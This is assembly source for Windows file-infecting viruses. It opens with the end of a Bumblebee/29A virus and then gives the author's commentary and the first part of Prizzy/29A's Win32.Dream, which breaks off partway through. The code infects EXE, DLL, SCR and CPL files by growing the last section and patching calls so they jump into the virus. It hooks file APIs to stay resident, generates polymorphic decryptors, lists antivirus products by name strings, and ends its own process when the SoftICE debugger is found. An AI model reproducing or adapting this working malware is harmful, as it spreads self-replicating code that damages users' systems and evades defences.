jmp nextImp
doHook:
mov eax,dword ptr [edx+4]
add eax,ebp
mov dword ptr [esi-4],eax
add edx,8
cmp edx,ecx
jne nextImp
noHook:
popad
ret
;
; Changes to upper case the string by esi storing into stringBuffer.
; Sets carry flag if our string buffer is small. Returns in edi the
; end of the string into the buffer.
;
stringUp:
push esi eax
lea edi,stringBuffer+ebp
mov eax,edi
add eax,STRINGTOP
stringUpLoop:
cmp eax,edi
jne continueStringUp
stc
jmp stringUpOut
continueStringUp:
movsb
cmp byte ptr [esi-1],'a'
jb skipThisChar
cmp byte ptr [esi-1],'z'
ja skipThisChar
add byte ptr [edi-1],'A'-'a'
skipThisChar:
cmp byte ptr [esi-1],0
jne stringUpLoop
dec edi
clc
stringUpOut:
pop eax esi
ret
;
; The hooks.
;
Hook0:
@hook _CreateFileA
Hook1:
@hook _MoveFileA
Hook2:
@hook _CopyFileA
Hook3:
@hook _CreateProcessA
Hook4:
@hook _SetFileAttributesA
Hook5:
@hook _GetFileAttributesA
Hook6:
@hook _SearchPathA
Hook7:
@hook _SetCurrentDirectoryA
;
; This is the general hook that provides per-process residency.
;
generalHook:
push eax
pushad
pushfd
cld
; check if filename==NULL
mov esi,dword ptr [esp+2ch]
or esi,esi
jz leaveHook
; check semaphore
cmp byte ptr [semHook+ebp],0
jne leaveHook
skipPayloadEffect:
call stringUp
jc hookInfectionFail
infectThisFile:
lea esi,stringBuffer+ebp ; erm... here could touch
call infect ; any av!
hookInfectionFail:
mov byte ptr [semHook+ebp],0
leaveHook:
popfd
popad
ret
;
; Infects PE files in current directory. It affects EXE, SCR, CPL and DLL
; extensions.
;
infectDir:
pushad
lea esi,find_data+ebp
push esi
lea esi,fndMask+ebp
push esi
call dword ptr [_FindFirstFileA+ebp]
inc eax
jz notFound
dec eax
findNext:
lea esi,find_data.cFileName+ebp
call stringUp
lea esi,stringBuffer+ebp
push edi ; test the string it's
sub edi,esi ; long enought
cmp edi,5
pop edi
jna skipThisFile
cmp dword ptr [edi-4],'EXE.'
je validFileExt
cmp dword ptr [edi-4],'LLD.'
je validFileExt
cmp dword ptr [edi-4],'LPC.'
je validFileExt
cmp dword ptr [edi-4],'RCS.'
jne skipThisFile
validFileExt:
mov eax,dword ptr [find_data.nFileSizeLow+ebp]
cmp eax,8000h
jb skipThisFile ; at least 8000h bytes?
mov ecx,PADDING ; test if it's infected
xor edx,edx ; yet
div ecx
or edx,edx ; reminder is zero?
jz skipThisFile
lea esi,stringBuffer+ebp
call infect
skipThisFile:
lea esi,find_data+ebp
push esi
push dword ptr [findHnd+ebp]
call dword ptr [_FindNextFileA+ebp] ; Find next file
or eax,eax
jnz findNext
infectionDone:
push dword ptr [findHnd+ebp]
call dword ptr [_FindClose+ebp]
notFound:
popad
ret
;
; Infects PE file increasing last section.
;
; ESI: addr of file name of PE to infect.
;
infect:
pushad
mov dword ptr [fNameAddr+ebp],esi
push esi
push esi
call dword ptr [_GetFileAttributesA+ebp]
pop esi
inc eax
jz infectionError
dec eax
push esi
push 00000080h
push esi
call dword ptr [_SetFileAttributesA+ebp]
pop esi
or eax,eax
jz infectionError
xor eax,eax
push eax
push 00000080h
push 00000003h
push eax
push eax
push 80000000h OR 40000000h
push esi
call dword ptr [_CreateFileA+ebp]
inc eax
jz infectionErrorAttrib
dec eax
push 0h
push eax
call dword ptr [_GetFileSize+ebp]
inc eax
jz infectionErrorClose
dec eax
lea edi,fileTime2+ebp
push edi
lea edi,fileTime1+ebp
push edi
lea edi,fileTime0+ebp
push edi
push dword ptr [fHnd+ebp]
call dword ptr [_GetFileTime+ebp]
or eax,eax
jz infectionErrorClose
xor eax,eax
push eax
push eax
push eax
push 00000004h
push eax
push dword ptr [fHnd+ebp]
call dword ptr [_CreateFileMappingA+ebp]
or eax,eax
jz infectionErrorClose
xor eax,eax
push eax
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [fhmap+ebp]
call dword ptr [_MapViewOfFile+ebp]
or eax,eax
jz infectionErrorCloseMap
mov edi,eax
cmp word ptr [edi],'ZM'
jne infectionErrorCloseUnmap
mov edx,edi
impSectionFound:
or dword ptr [esi+24h],80000000h ; make writable
xor eax,eax
push eax
push dword ptr [pad+ebp]
push eax
push 00000004h
push eax
push dword ptr [fHnd+ebp]
call dword ptr [_CreateFileMappingA+ebp]
or eax,eax
jz infectionErrorClose
xor eax,eax
push dword ptr [pad+ebp]
push eax
push eax
push 00000004h OR 00000002h
push dword ptr [fhmap+ebp]
call dword ptr [_MapViewOfFile+ebp]
or eax,eax
jz infectionErrorCloseMap
infectionErrorCloseUnmap:
push dword ptr [mapMem+ebp]
call dword ptr [_UnmapViewOfFile+ebp]
infectionErrorCloseMap:
push dword ptr [fhmap+ebp]
call dword ptr [_CloseHandle+ebp]
lea edi,fileTime2+ebp
push edi
lea edi,fileTime1+ebp
push edi
lea edi,fileTime0+ebp
push edi
push dword ptr [fHnd+ebp]
call dword ptr [_SetFileTime+ebp]
infectionErrorClose:
push dword ptr [fHnd+ebp]
call dword ptr [_CloseHandle+ebp]
infectionErrorAttrib:
push dword ptr [fileAttrib+ebp]
push dword ptr [fNameAddr+ebp]
call dword ptr [_SetFileAttributesA+ebp]
infectionError:
popad
ret
;
; Here the virus marks the file as no valid. This avoids later re-check
; the file in next executions of virus. Notice the infected files are not
; marked, for this issue i use size padding and test last section properties
; in second instance. Avers will find this mark in files that the virus
; doesn't want ;)
;
notValidFile:
mov edi,dword ptr [mapMem+ebp]
mov word ptr [edi+12h],'(:' ; checked but not valid!
jmp infectionErrorCloseUnmap
;
; This my 'search EPO' routine. Searches for a call into the code section
; that points to:
;
; push ebp
; mov ebp,esp
;
; This is the way the high level languages get the arguments from a call
; of a procedure. If this code is found i assume the call found it's
; correct and i patch it to jump into the virus.
;
searchEPO:
pushad
mov edi,dword ptr [esi+28h] ; get host EP
xor ecx,ecx
mov cx,word ptr [esi+06h] ; number of sections
mov esi,dword ptr [fstSec+ebp] ; get 1st section addr
sectionFound:
test dword ptr [esi+24h],10000000h ; avoid this kind of section
jnz searchEPOFail ; we can corrupt it!
push esi
sub edi,dword ptr [esi+0ch] ; get raw address
add edi,dword ptr [esi+14h]
mov ecx,dword ptr [esi+10h]
cmp ecx,edi
jna searchEPOFail
sub ecx,edi
add edi,dword ptr [mapMem+ebp]
mov ebx,edi
add ebx,ecx
sub ebx,10h ; high secure fence
callLoop: ; loop that searches
cmp byte ptr [edi],0e8h ; for the call
jne continueCallLoop
mov edx,edi
add edx,dword ptr [edi+1]
add edx,5
cmp ebx,edx
jb continueCallLoop
cmp edx,dword ptr [mapMem+ebp]
jb continueCallLoop
mov esi,edx
mov dx,word ptr [esi]
cmp dx,08b55h
jne continueCallLoop
mov dx,word ptr [esi+1]
cmp dx,0ec8bh
jne continueCallLoop
mov dword ptr [EPOAddr+ebp],edi
sub edi,dword ptr [mapMem+ebp]
pop esi
add edi,dword ptr [esi+0ch] ; get rva address
sub edi,dword ptr [esi+14h]
mov dword ptr [EPORva+ebp],edi
clc
jmp searchEPOOut
continueCallLoop:
inc edi
loop callLoop
searchEPOFail:
pop esi
stc
searchEPOOut:
popad
ret
;
; Updates the virus sample ready to infect in our memory buffer.
;
updateVSample:
lea edx,dateTime+ebp
push edx
call dword ptr [_GetSystemTime+ebp]
add eax,12
storeCountdown:
mov word ptr [countdown+ebp],ax
xor eax,eax
push edi
mov cl,_EBP
call AddPushREG
mov ax,0ec8bh
stosw
call GetReg
mov byte ptr [KeyReg+ebp],al
mov cl,al
call AddPushREG
call GetReg
mov byte ptr [LoopReg+ebp],al
mov cl,al
call AddPushREG
mov cl,byte ptr [KeyReg+ebp]
mov edx,dword ptr [CrptKey+ebp]
call AddMovREGINM
mov edx,04h
mov cl,_EBP
call AddMovREGMEMEBP
push edi
noSADD:
test byte ptr [CrptFlags+ebp],F_SSUB
jz noSSUB
noSSUB:
mov cl,_EBP
mov edx,04h
call AddAddREGINM
pop ebx
mov eax,edi
sub eax,ebx
push eax
mov al,75h
stosb
pop eax
mov ah,0feh
xchg al,ah
sub al,ah
stosb
mov cl,_EBP
call AddPopREG
mov al,0c3h
stosb
pop esi
sub edi,esi
mov eax,edi
ret
;
; Poly engine data
;
_EAX equ 0
_ECX equ 1
_EDX equ 2
_EBX equ 3
_ESP equ 4
_EBP equ 5
_ESI equ 6
_EDI equ 7
F_SADD equ 1 or 4
F_SSUB equ 2 or 4
RegStatus db 8 dup(0)
CrptFlags db 0
KeyReg db 0
LoopReg db 0
CrptKey dd 0
CodeSize dd 0
;
; returns AL: selected register
;
GetReg:
xor eax,eax
mov al,byte ptr [CrptKey+ebp]
GetReg1:
and al,7
lea ecx,RegStatus+ebp
add ecx,eax
mov dl,byte ptr [ecx]
or dl,dl
jz GetReg0
inc al
jmp GetReg1
GetReg0:
mov byte ptr [ecx],1
ret
;
; AL: selected register to free
;
FreeReg:
and eax,7
lea ecx,RegStatus+ebp
add ecx,eax
mov byte ptr [ecx],0
ret
;
; Instruction generators
;
; EDI: Destination code
; ECX: Reg (if applicable)
; EDX: Inm (if applicable)
;
AddPushREG:
mov al,050h
add al,cl
stosb
ret
AddPopREG:
mov al,058h
add al,cl
stosb
ret
AddMovREGINM:
mov al,0b8h
add al,cl
stosb
mov eax,edx
stosd
ret
AddMovREGMEMEBP:
mov al,08bh
stosb
mov al,08h
mul cl
add al,85h
stosb
mov eax,edx
stosd
ret
AddXorMEMEBPREG:
mov al,031h
stosb
mov al,08h
mul cl
add al,45h
stosb
xor al,al
stosb
ret
AddAddREGINM:
or cl,cl
jnz AddAddREGINM0
mov al,05h
stosb
jmp AddAddREGINM1
AddAddREGINM0:
mov al,081h
stosb
mov al,0c0h
add al,cl
stosb
AddAddREGINM1:
mov eax,edx
stosd
ret
AddSubREGINM:
or cl,cl
jnz AddSubREGINM0
mov al,2dh
stosb
jmp AddSubREGINM1
AddSubREGINM0:
mov al,081h
stosb
mov al,0e8h
add al,cl
stosb
AddSubREGINM1:
mov eax,edx
stosd
ret
;
; This is our func that does the partial check sum of the file. I know it
; must be improved... but i'm so lazy :( (still lazy)
;
; in: ecx (fileSize+1) shr 2
; esi offset mappedFile
;
; out: eax partial checksum of file
;
CheckSumMappedFile:
push esi
xor eax, eax
shl ecx, 1
je func0_saltito0
test esi, 00000002h
je func0_saltito1
sub edx, edx
mov dx, word ptr [esi]
add eax, edx
adc eax, 00000000h
add esi, 00000002h
sub ecx, 00000002h
func0_saltito1:
mov edx, ecx
and edx, 00000007h
sub ecx, edx
je func0_saltito2
test ecx, 00000008h
je func0_saltito3
add eax, dword ptr [esi]
adc eax, dword ptr [esi+04h]
adc eax, 00000000h
add esi, 00000008h
sub ecx, 00000008h
je func0_saltito2
func0_saltito3:
test ecx, 00000010h
je func0_saltito4
add eax, dword ptr [esi]
adc eax, dword ptr [esi+04h]
adc eax, dword ptr [esi+08h]
adc eax, dword ptr [esi+0Ch]
adc eax, 00000000h
add esi, 00000010h
sub ecx, 00000010h
je func0_saltito2
func0_saltito4:
test ecx, 00000020h
je func0_saltito5
add eax, dword ptr [esi]
func0_saltito5:
test ecx, 00000040h
je func0_saltito6
add eax, dword ptr [esi]
func0_saltito6:
add eax, dword ptr [esi]
func0_saltito2:
test edx, edx
je func0_saltito0
func0_saltito7:
sub ecx, ecx
mov cx, word ptr [esi]
add eax, ecx
adc eax, 00000000h
add esi, 00000002h
sub edx, 00000002h
jne func0_saltito7
func0_saltito0:
mov edx, eax
shr edx, 10h
and eax, 0000FFFFh
add eax, edx
mov edx, eax
shr edx, 10h
add eax, edx
and eax, 0000FFFFh
pop esi
ret
;
; Virus data ---------------------------------------------------------------
;
HOOKTABLEBEGIN label byte
dd offset _CreateFileA
dd offset Hook0
dd offset _MoveFileA
dd offset Hook1
dd offset _CopyFileA
dd offset Hook2
dd offset _CreateProcessA
dd offset Hook3
dd offset _SetFileAttributesA
dd offset Hook4
dd offset _GetFileAttributesA
dd offset Hook5
dd offset _SearchPathA
dd offset Hook6
dd offset _SetCurrentDirectoryA
dd offset Hook7
HOOKTABLEEND label byte
CrcMapViewOfFile dd 0797b49ech
db 14
_MapViewOfFile dd 0
CrcCreatFileMappingA dd 096b2d96ch
db 19
_CreateFileMappingA dd 0
CrcUnmapViewOfFile dd 094524b42h
db 16
_UnmapViewOfFile dd 0
CrcCloseHandle dd 068624a9dh
db 12
_CloseHandle dd 0
CrcFindFirstFileA dd 0ae17ebefh
db 15
_FindFirstFileA dd 0
CrcFindNextFileA dd 0aa700106h
db 14
_FindNextFileA dd 0
CrcFindClose dd 0c200be21h
db 10
_FindClose dd 0
CrcVirtualAlloc dd 04402890eh
db 13
_VirtualAlloc dd 0
CrcGetTickCount dd 0613fd7bah
db 13
_GetTickCount dd 0
CrcGetFileTime dd 04434e8feh
db 12
_GetFileTime dd 0
CrcSetFileTime dd 04b2a3e7dh
db 12
_SetFileTime dd 0
CrcSetFileAttributesA dd 03c19e536h
db 19
_SetFileAttributesA dd 0
CrcGetFileAttributesA dd 0c633d3deh
db 19
_GetFileAttributesA dd 0
CrcGetFileSize dd 0ef7d811bh
db 12
_GetFileSize dd 0
CrcGetSystemTime dd 075b7ebe8h
db 14
_GetSystemTime dd 0
CrcMoveFileA dd 02308923fh
db 10
_MoveFileA dd 0
CrcCopyFileA dd 05bd05db1h
db 10
_CopyFileA dd 0
CrcCreateProcessA dd 0267e0b05h
db 15
_CreateProcessA dd 0
CrcSearchPathA dd 0f4d9d033h
db 12
_SearchPathA dd 0
CrcGetCurrentDirectoryA dd 0ebc6c18bh
db 21
_GetCurrentDirectoryA dd 0
CrcSetCurrentDirectoryA dd 0b2dbd7dch
db 21
_SetCurrentDirectoryA dd 0
CrcGetWindowsDirectoryA dd 0fe248274h
db 21
_GetWindowsDirectoryA dd 0
ENDAPI label byte
; AV: AVP, PAV, NAV, ...
; AN: SCAN, VISUSSCAN, ...
; DR: DRWEB
; ID: SPIDER
; OD: NOD-ICE
; TB: THUNDERBYTE... (this still exists?)
; F-: F-PROT, ...
avStrings dw 'VA','NA','RD','DI','DO','BT','-F'
vStringsCout equ (offset $-offset avStrings)/2
fndMask db '*.*',0
fHnd dd 0
fhmap dd 0
mapMem dd 0
infCount db 0
fileSize dd 0
fileAttrib dd 0
fileTime0 dd 0,0
fileTime1 dd 0,0
fileTime2 dd 0,0
pad dd 0
fNameAddr dd 0
gensize dd 0
myRVA dd 0
fstSec dd 0
find_data WIN32_FIND_DATA <0>
findHnd dd 0
semHook db 0
EPORva dd 0
EPOAddr dd 0
dateTime db 16 dup(0)
payload db 0
pchcks dw 0
BUFFEREND label byte
BUFFERSIZE equ BUFFEREND-BUFFERBEGIN
;
; Fake host for 1st generation
;
fakeHost:
push 1000h
title: @strz "(C) 2000 Bumblebee/29a"
mess: @strz "99 Ways To Die activated. Have a nice day."
push 0h
call MessageBoxA
push 0h
call ExitProcess
Ends
End inicio
;
; hi sweet!
;
; ' the preacher said, richer or poorer
; my mama said, thick or thin
; you can kiss me, baby
; when it's time to get thick again '
;
;
;
; ÚÄÄÍÍÍÍÍÍÍÍÄÄÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ÄÄÍÍÍÍÍÍÍÍÄÄ¿
; : Prizzy/29A : Win32.Dream : Prizzy/29A :
; ÀÄÄÍÍÍÍÍÍÍÍÄÄÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙÄÄÍÍÍÍÍÍÍÍÄÄÙ
;
; Hello people, here is my third virus especially when it is designed for
; whole Win32 platform. It infects only EXE (PE - Portable Executable)
; files and also HLP (Windows Help File Format).
;
; When infected EXE file is started, EIP goes through my easy polymorphic
; engine, which isn't so important in this virus, then hooks CreateFileA
; function, installs itself into memory and only then it can put EIP to
; the host - there're two returns, one for EXE the other for HLP files.
;
; With might and mind I wanted to use only it the best from new high-tech
; vx methods we know. And I think is nothing worst than virus equipped of
; interprocess communication (IPC). I also changed my coding style and
; this source is most optimization as I could.
;
;
; Detailed Information
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;
;
; 1. Interprocess Communication (IPC)
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; You could see one IPC virus (Vulcano) by Benny/29A but I used this fea-
; ture other way than he. His IPC virus is only in one process and it can
; communicate with others viruses in another process.
;
; The parts of my Win32.Dream virus work in several processes and in fact
; it behades like one whole virus. After installing to memory, virus will
; remove itself from memory of the infected program.
;
;
; 1.1. Creating processes
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; This virus is divided into seven 'independent' functions which have own
; process. To create new process I would build a dropper and via the Cre-
; ateProcessA I would run them.
;
; The dropper wait than new function for its process is ready, if yes, it
; shares two mapped blocks (OpenFileMappingA) for that process (it's Glo-
; bal memory and Function's body) and creates thread on the function. The
; process can't terminate it can only Sleep. All created processed are
; hiden in Windows 95, not in WinNT/2k (is't more complex).
;
;
; 1.2. IPC in action
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Hooked CreateFileA functions retrieves control, sets flag for certain
; process and awakes its. That process finishes own task and returns re-
; sults.
;
;
; 1.3. Global memory
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; It's necessary to share some important information among all processes.
; There are:
;
; + [thandle] : When the dropper will create new thread here is re-
; turned handle. It indicates the thread's errorcode.
; + [th_mempos] : Here is stored the name of the Function's mapped
; object. The dropper will open that memory area.
; + [process] : hProcess, ProcessID values of the all created pro-
; cesses because of opening/runing them.
; + [apiz] : The addresses of the all APIz I call are on this
; place.
; + [active] : If other process wants to run me, sets certain flag
; here and the thread tests it.
; + [paramz] : This is place where the virus store some parameters
; among processes (see below).
; + [vbody] : Here is the copy of the virus, useful for changing
; values inside and for poly engine.
; + [filename] : The future infected filename. New CreateFileA func-
; tion stores the name here.
; + [cinfected] : Two FPU memory buffers, one for creating of the in-
; fection mark the other for checking.
; + [poly_vbody] : Output from polymorphic engine.
;
;
; 1.4. Parameters
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; As I wrote above I have to get some parameters of the input processes.
; Here is the description of them:
;
; + [1st
param] : Out of polymorhpic engine, the new size of the virus
; + [2nd
param] : Filesize for checksum (+poly size yet).
; + [3rd
param] : The name of the mapped file (for OpenFileMappingA).
; + [4th
param] : a. Filesize for check_infected (without poly size).
; b. Out of checksum.
; + [5th param] : Input for check_infected, if '1', then it wants to
; get an angle for create_infected.
; + [6th param] : Terminate all processes ? (WinNT/2000 only)
; + [7th param] : Terminate all processes ? (Win95/98 only)
; (because of Win95/98 kernel bug)
;
;
; 1.5. Termination of the all processes
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; I remember it was a nut for me but of course I'd to solve it. At first
; I changed flags of the process (SetErrorMode, it means, the process 'll
; not show any message box if it will do bad instructions), then I had to
; check if the host lives yet. In Win95/98 I have discovered a kernel bug
; so that I couldn't use WinNT version (OpenProcess) to check if the host
; still exists because Win95/98 don't delete its process id handle.
; Win95 - you can only read some value the from allocated memory by host.
; WinNT - that allocated memory is opened by other process, you can't
; identify if the host still exists.
;
;
; 1.6. The scheme of the all processes
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;
;
; ÉÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ»
; ³ new CreateFileA API function ³
; ÈÍÄÄÄÄÑÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄͼ
; ³
; ÉÍÄUSÄÄÄÄÄÄÄÄÄÄÄÍ»
; ³ infect file ³ ÉÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄÍ»
; ÈÍÄÑÄÄÄÄÄÄÄÄÄÄÄͼ ÚÄÄÄDLE infect HLP ³
; ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÈÍÄÄÄÄÄÄÄÄÄÄÄÄÄÄͼ
; ³
; ³ ÉÍÄÄÄÄÄÄÄÄÍ»
; ³ º º ÚÄÄDLE [check_infected]
; ³ ³ ÃÄÄÄÄBELÄÄÄÙ
; ³ ³ infect ÃÄÄÄÄÅÄÄÄÄÄÄDLE [poly_engine]
; ÀÄÄÄDLE ³ ³
; ³ EXE ÃÄÄÄÄÅÄÄÄÄÄÄDLE [create_infected]
; ³ ÃÄÄÄÄBELÄÄÄ¿
; º º ÀÄÄDLE [checksum]
; ÈÍÄÄÄÄÄÄÄÄļ
;
;
; 2. Optimalization and comments
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Sometimes I heard my last virus Win32.Crypto is too huge and also some
; people had a fun from me (benny, mort - gotcha bastards!) that my next
; virus will be bigger than one megabyte. I wanted to optimize next one
; and I've not told them it so I think it'll be surprise for them I pro-
; ved. Nevertheless I've a taste of the second side and now I can return
; myself without any major problems. But now I can say the virus is more
; optimization than benny's bits and pieces. The source code is not com-
; mented enough because I think no many people will taste something like
; IPC is. If yes, they can contact me.
;
;
; 3. Check infected routine
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Long ago in Win32.Crypto I tasted to use unique math technique how to
; check if the file is infected. Now I thought up new more complex way.
; At first from infected file I'll compile the equation, for example:
; y = 32*x^7 + 192*x^3 - 8212*x^5 - 72*x
; and I'll get two points on that curve, for example x1=4 and x2=7. Then
; I will calculate what angle is between the tangents to the curve from
; that two points, it means: I have to calculate derivation y' of that
; equation and if I know y=x1 and y=x2 then I will determine:
; & = arc tg | log(x1 - x2) - log(1 + x1*x2) |
; If the angle will be greater e.g. than 75 degree, file is infected.
;
; This algorithm has been coded only for fun so that I know we've easier
; methods but I couldn't call to remembrance on any.
;
;
; 4. Pearls behind the scene
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; * Only two weeks before release I've think the virus name up at last.
; * At a time, during coding, I stopped writing and this virus I haven't
; coded for two months. Later when I started again I couldn't remember
; what that code does and so on.
; * In present exists over than fifty backup copies.
; * The worst part of the virus was the dropper, there were many changes
; because of Win9x and WinNT compatibility; many bugs were there.
; * After a hour of the coding I unwillingly deleted new version. So that
; I'd to save more than one gigabytes from FAT32 on another hard disk.
; Only there I found that lost version.
; * The best thing I like on the whole virus is main comment.
; * Working directory was 'E:\X_WIN\' and this file name was 'WIN.AS!'.
; * Last week I was looking for help on mirc
; <prizzy> i used also OpenFileMapping, but I think yes; if ...
; <Bumblebee> mmm
; <Bumblebee> OpenFileMapping?
; <prizzy> yes :)
; <Bumblebee> i've never used it [bumble~1.log, 18:59:17]
; ...but much help I haven't found there (although Bumblebee helped
; me with another bug).
; * During whole coding I've read five books and three film scripts.
;
;
; 5. List of greetings
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; Darkman The master of the good optimistic mood
; Bumblebee Thanks for your help during coding
; Billy Belcebu So, our communication has started yet
; GriYo All the time busy man
; Lord Julus Waiting for your new virus and its meta engine
; Mort So did you think this source will be bigger then
; one megabytes? Sorry, maybe later :).
; J.P. I look forward on future with you, dude.
; Ratter No, no. Stop reading and let you show us what you
; are hiding inside.
; VirusBuster Here is that secret bin with savage poly engine as
; you wrote on #virus.
; Benny It the best in the end, benny. Haha, at last this
; source is optimized and you will stop to worry me.
; Thanks for all you have e'er done for me.
; ...and for flush, asmodeus, mlapse, mgl, f0re and evul.
;
;
; 6. Contact me
; ÄÄÄÄÄÄÄÄÄÄÄÄÄ
; prizzy@coderz.net
; http://prizzy.cjb.net
;
;
; (c)oded by Prizzy/29A, June 2000
;
;
.486p
.model flat,STDCALL
locals
include include\mz.inc
include include\pe.inc
extrn ExitProcess:proc
extrn CreateFileA:proc
extrn MessageBoxA:proc
.data
db ?
.code
vstart proc
pusha
call $+5
pop ebp
sub ebp,$-vstart-1 ;get delta
vsize equ file_end - vstart
mov eax,[esp+vsize+32]
sub eax,1000h
inf_ep equ $-4
mov [ebp+ha_module-vstart],eax
add eax,fg0 - vstart + 1000h
org_ep equ $-4 ;get startup address
push eax
call get_k32_apis
jmp __return
@anti_e:
call kill_st
call check_resident ;try to create it
call create_process_maps
.if byte ptr [ebp+error-vstart] == 0
call hookapi
.endif
__return:
pop dword ptr [esp+28]
popa
sub esp,-vsize-4
db 90h,90h
jmp eax ;exe back
xor eax,eax ;hlp back
ret 8
vstart endp
get_k32_apis proc
push 20
mov eax,[esp+vsize+48] ;find k32 address
sub ax,ax
pop ecx
@@1:.if word ptr [eax] != 'ZM'
sub eax,65536
loop @@1
jmp gk32a_f_a
.endif
cmp byte ptr [ebp+__return+11-vstart],90h
jz $+5
pop eax
jmp __return
push eax eax ;get k32 tables
add eax,[eax+60]
pop ebx edi
add ebx,[eax+78h]
mov cl,0
@@3:push ebx ecx
mov edx,[ebx+32]
add edx,edi
@@4:mov esi,[edx] ;calculate next crc32 func.
add esi,edi
push ecx edx ebx ;crc32 algorithm
stc
sbb ecx,ecx
mov edx,ecx
@@4_crc32_nByte:
sub eax,eax
sub ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
@@4_crc32_nBit:
shr bx,1
rcr ax,1
jnc @@4_crc32_no
xor ax,08320h
xor bx,0edb8h
@@4_crc32_no:
dec dh
jnz @@4_crc32_nBit
xor ecx,eax
xor edx,ebx
cmp byte ptr [esi-1],0
jnz @@4_crc32_nByte
@@4_crc32_fin:
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
pop edx ecx
cmp [ebp+k32_crcs+ecx*4-vstart],eax ;crc32 == my func ?
jz @@5
sub edx,-4
jmp @@4
gk32a_f_a:
jmp gk32a_f
@@3_a:
jmp @@3
@@5:sub edx,[ebx+32] ;get addr of the new func.
sub edx,edi
shr edx,1
add edx,[ebx+36]
add edx,edi
movzx edx,word ptr [edx]
shl edx,2
add edx,[ebx+28]
mov edx,[edx+edi]
add edx,edi
pop ecx ebx
movzx eax,word ptr [ebp+ecx*2+k32_addrs-vstart]
neg ax
mov [ebp+eax],edx ;store its
@@5a:inc ecx
mov eax,edi
rol eax,8
sub al,0BFh
jz @@5b
cmp ecx,14
jz @@5a
@@5b:cmp ecx,count
jnz @@3_a
push p_number+1 ;update Sleep function
pop ecx
@@6:movzx eax,word ptr [ebp+process_maps+ecx*2-vstart-2]
neg ax
mov [ebp+eax+2],edx
@@7:loop @@6
test al,0C3h
gk32a_f equ $-1
pop eax
push cs ;anti-emulator
lea eax,[ebp+@anti_e-vstart]
push eax
retf
get_k32_apis endp
kill_st proc
call @sNT+10
@s95:db '\\.\SICE',0 ;name drivers
@sNT:db '\\.\NTICE',0
pop ebx
call open_file ;open SoftICE 95/98 or
jz @ks_nt ; SoftICE NT/2k driver
dec eax
push eax
mov eax,0
lpCloseHandle equ $-4
call eax
jmp @ks_kill ;kill process
@ks_nt:
sub ebx,@s95-@sNT ;open the second driver
call open_file
jz @ks_dos
dec eax
call [ebp+lpCloseHandle-vstart]
@ks_kill:
push eax
mov eax,0
lpExitProcess equ $-4
call eax
@ks_dos:
cmp dword ptr fs:[32],0 ;TD32 etc.
jnz @ks_kill
ret
open_always_file:
sub eax,eax ;create file always
push eax ;useful for droppers
mov cl,80h
push ecx 2
jmp $+8
open_file:
sub eax,eax ;open file in ebx
push eax edx 3
cdq
mov dl,0C0h
bswap edx
push eax eax edx ebx
mov eax,0
lpCreateFile equ $-4
call eax
inc eax
ret
kill_st endp
check_resident proc
push ebp 1 0 ;create mutex or get if it
mov eax,0 ;has been created => in mem
lpCreateMutexA equ $-4
call eax
xchg eax,ebx
mov eax,0
lpGetLastError equ $-4
call eax
xchg eax,esi
or esi,esi
jz @cr_f
push ebx
mov eax,0
lpReleaseMutex equ $-4
call eax
@cr_f:or esi,esi
pop eax
jnz __return
jmp eax
check_resident endp
create_process_maps proc
mov byte ptr [ebp+error-vstart],1
call build_dropper ;create dropper in sys dir
jc cpm_fnodeal
mov eax,0
lpGetCurrentProcessId equ $-4
call eax
mov [ebp+if_parent-vstart],eax
sub ebx,ebx
push 80h
cpm_shared_mem equ $-4
push 7
mov eax,0
lpSetErrorMode equ $-4
call eax
pop ecx
lea edi,[ecx+vbody]
push ecx
mov esi,ebp
mov ecx,vsize
rep movsb
cpm_nxproc:
pop eax
lea edi,[eax+8+ebx*8]
push eax
mov [eax],edi
call @@1
dd 0,0,0,0 ;hProc, hThr, ProcID, ThrID
@@1:pop esi
lea eax,[ebp+vsize]
push esi eax 68
pop ecx
@@1a:mov [eax],ch
inc eax
loop @@1a
push ecx ecx 640 1 ecx ecx 80h ecx
cpm_cmdline equ $-5
inc ecx
mov dword ptr [eax-6*4],ecx
mov eax,0
lpCreateProcessA equ $-4
call eax
or eax,eax
jz cpm_failed
lodsd ;get hProcess and ProcessID
stosd
lodsd
lodsd
